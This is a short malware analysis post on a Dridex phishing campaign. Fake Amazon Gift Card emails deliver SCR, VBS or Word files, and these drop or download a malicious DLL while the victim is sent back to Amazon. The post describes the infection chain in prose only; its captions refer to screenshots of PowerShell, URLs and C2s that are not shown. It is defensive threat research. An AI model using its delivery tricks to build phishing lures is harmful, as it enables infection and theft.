Technical analysis by the Malware Hunter JAMESWT

Dridex hides behind a fake Amazon Gift Card to spread in a new global campaign. The link in the messages directs the victim to a url (different for each email) and downloads an SCR, a VBS or a doc, which activate the malware infection

Dridex leverages Amazon Gift Card for a new global campaign. The emails contain the official company logos and invite potential victims to download the card via a link. This, however, when opened redirects the user to a url (different for each email) which in some cases downloads an SCR, in others a Vbs script and other times a Word document. Once the download is complete, you are automatically sent back to the Amazon page. If the downloaded file is executed then the malware infection starts. In the case of the SCR, it is a self-extracting archive that contains scripts that execute the malicious Dll, either in clear text or in another compressed file, sometimes protected by a password. In the case of the VBS, the methods are the same: if executed, it extracts from itself a compressed archive in zip format with the Dll inside. The user, however, does not see anything of the whole process and is forced to think that the fake Gift Card does not work, waiting in vain for a PDF to be opened. Finally, in the case of the Word document, once opened it automatically downloads the random DLL from a list of urls inside the document without the end user having evidence of anything.

Two examples of fake Gift Card email

The doc file image

The content extracted from one of the SCRs downloaded via email link (with dll)

The contents of the zip extracted from the VBS (with Dll highlighted)

The contents of the zip extracted from one of the SCRs with its script and dll

Powershell executed by the DOC where the urls contacted to download the DLL are detected

The urls contacted by the DOC running in anyrun sandbox

The C2s